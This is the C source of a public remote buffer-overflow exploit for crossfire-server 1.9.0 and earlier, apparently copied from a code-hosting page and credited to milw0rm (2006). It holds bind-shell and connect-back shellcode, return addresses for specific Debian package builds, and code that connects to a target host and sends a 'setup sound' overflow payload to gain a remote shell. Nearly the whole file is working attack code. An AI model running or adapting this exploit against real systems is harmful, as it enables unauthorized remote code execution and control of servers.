208 lines
No EOL
5 KiB
C
208 lines
No EOL
5 KiB
C
// crossfire-server <= 1.9.0 "SetUp()" remote buffer overflow
|
|
//
|
|
// exploit by landser - ihsahn at gmail com
|
|
// vote http://shinui.org.il
|
|
//
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
#include <getopt.h>
|
|
#include <arpa/inet.h>
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <netdb.h>
|
|
|
|
#define PORT 13327 // default port
|
|
#define SC_PORT 33333 // default shellcode port
|
|
#define SC_HOST "127.0.0.1" // default shellcode host
|
|
|
|
unsigned char sc_cb[] = // izik's
|
|
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
|
|
"\x80\x5b\x5d\xbeHOST\xf7\xd6\x56\x66\xbdPR\x0f\xcd\x09\xdd"
|
|
"\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"
|
|
"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f"
|
|
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";
|
|
|
|
unsigned char sc_bind[] = // izik's
|
|
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
|
|
"\x80\x5b\x5d\x52\x66\xbdPR\x0f\xcd\x09\xdd\x55\x6a\x10\x51"
|
|
"\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5f"
|
|
"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x93\xb0\x02\xcd"
|
|
"\x80\x85\xc0\x75\x1a\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
|
|
"\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
|
|
"\x53\xeb\xb2\x6a\x06\x58\xcd\x80\xb3\x04\xeb\xc9";
|
|
|
|
struct {
|
|
const char *type;
|
|
unsigned char *code;
|
|
} shellcodes[] = {
|
|
{"bind", sc_bind},
|
|
{"connectback", sc_cb},
|
|
};
|
|
|
|
struct {
|
|
const char *ver;
|
|
unsigned long ret; // a "jmp *%eax" instruction
|
|
unsigned short int len;
|
|
} targets[] = {
|
|
{"crossfire-server_1.6.0.dfsg.1-4_i386.deb", 0x080d6f48, 0x1028},
|
|
{"crossfire-server_1.8.0-2_i386.deb", 0x080506d7, 0x1130},
|
|
{"crossfire-server_1.9.0-1_i386.deb", 0x0807aefa, 0x1130},
|
|
{"crash", 0xcccccccc, 0x1300},
|
|
};
|
|
|
|
#define structsize(x) (sizeof x / sizeof x[0])
|
|
|
|
int s;
|
|
int n = -1;
|
|
unsigned char *sc = sc_bind; // default shellcode
|
|
unsigned char buf[0x2000];
|
|
|
|
void establish (char *, int);
|
|
void usage (char *);
|
|
void update (unsigned char *, int, char *);
|
|
void writebuf (void);
|
|
|
|
int main (int argc, char **argv) {
|
|
int port = 0; // default value
|
|
unsigned short int sc_port = 0;
|
|
char *sc_host = NULL;
|
|
|
|
printf("cf190.c by landser - ihsahn at gmail com\n\n");
|
|
|
|
char c;
|
|
while ((c = getopt(argc, argv, "t:p:h:d:s:")) != -1) {
|
|
switch (c) {
|
|
case 's': sc = shellcodes[atoi(optarg)].code; break;
|
|
case 'h': sc_host = strdup(optarg); break;
|
|
case 'd': sc_port = atoi(optarg); break;
|
|
case 't': n = atoi(optarg); break;
|
|
case 'p': port = atoi(optarg); break;
|
|
case '?': usage(argv[0]); return EXIT_FAILURE;
|
|
}
|
|
}
|
|
|
|
if ((n < 0) || (n >= structsize(targets))) {
|
|
printf("invalid target\n");
|
|
usage(argv[0]);
|
|
return EXIT_FAILURE;
|
|
}
|
|
|
|
if ((optind + 1) != argc) {
|
|
printf("no hostname\n");
|
|
usage(argv[0]);
|
|
return EXIT_FAILURE;
|
|
}
|
|
|
|
establish(argv[optind], port ? port : PORT);
|
|
|
|
update(sc, sc_port, sc_host);
|
|
|
|
writebuf();
|
|
|
|
printf("> sending\n");
|
|
|
|
if (send(s, buf, targets[n].len + 2, 0) < 0) {
|
|
perror("send()");
|
|
return EXIT_FAILURE;
|
|
}
|
|
usleep(100000);
|
|
|
|
printf("> done\n");
|
|
|
|
close(s);
|
|
|
|
return EXIT_SUCCESS;
|
|
}
|
|
|
|
void establish (char *ip, int port) {
|
|
struct sockaddr_in sa;
|
|
struct hostent *h;
|
|
|
|
if (!(h = gethostbyname(ip))) {
|
|
herror("gethostbyname()");
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
printf("> resolved %s to %s\n", ip,
|
|
inet_ntoa(**((struct in_addr **)h->h_addr_list)));
|
|
|
|
sa.sin_family = AF_INET;
|
|
sa.sin_port = htons(port);
|
|
sa.sin_addr = **((struct in_addr **)h->h_addr_list);
|
|
|
|
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
|
|
perror("socket()");
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
|
|
if (connect(s, (struct sockaddr *)&sa, sizeof(struct sockaddr)) < 0) {
|
|
perror("connect()");
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
|
|
printf ("> connected to %s:%d.\n", inet_ntoa(**((struct in_addr **)h->h_addr_list)), port);
|
|
}
|
|
|
|
void usage (char *argv0) {
|
|
int i;
|
|
|
|
printf("usage: %s -t <target> [-s <shellcode>] "
|
|
"[-d <connectback/bind port] [-h <connectback ip>] "
|
|
"host [-p <port>]\n", argv0);
|
|
|
|
printf("- targets:\n");
|
|
for (i=0;i<structsize(targets);i++)
|
|
printf("%d. %s\n", i, targets[i].ver);
|
|
|
|
printf("- shellcodes: (default 0)\n");
|
|
for (i=0;i<structsize(shellcodes);i++)
|
|
printf("%d. %s\n", i, shellcodes[i].type);
|
|
}
|
|
|
|
void update (unsigned char *code, int port, char *host) {
|
|
if (!port) port = SC_PORT;
|
|
|
|
if (!(port & 0xff) || !((port >> 8) & 0xff)) {
|
|
printf("bad cb port\n");
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
*(unsigned short int *)(strstr(code, "PR")) = port;
|
|
|
|
if (strstr(code, "HOST")) {
|
|
in_addr_t inaddr;
|
|
|
|
if (!host) host = SC_HOST;
|
|
inaddr = inet_addr(host);
|
|
|
|
if (inaddr == INADDR_NONE || strstr(host, "255")) {
|
|
// ~(255) is 0
|
|
printf("invalid cb hostname\n");
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
*(in_addr_t *)(strstr(code, "HOST")) = ~inaddr;
|
|
}
|
|
|
|
if (host) free(host);
|
|
}
|
|
|
|
void writebuf (void) {
|
|
unsigned char *ptr = buf;
|
|
|
|
memset(buf, 0x90, sizeof buf);
|
|
|
|
*ptr++ = (targets[n].len>> 8) & 0xff;
|
|
*ptr++ = targets[n].len & 0xff;
|
|
|
|
memcpy(ptr, "setup sound ", strlen("setup sound "));
|
|
ptr += strlen("setup sound ");
|
|
|
|
ptr += 120; // leave 120 nops before the shellcode
|
|
memcpy(ptr, sc, strlen(sc));
|
|
|
|
ptr = &buf[targets[n].len - 10];
|
|
*(unsigned long *)ptr = targets[n].ret;
|
|
}
|
|
|
|
// milw0rm.com [2006-03-13]
|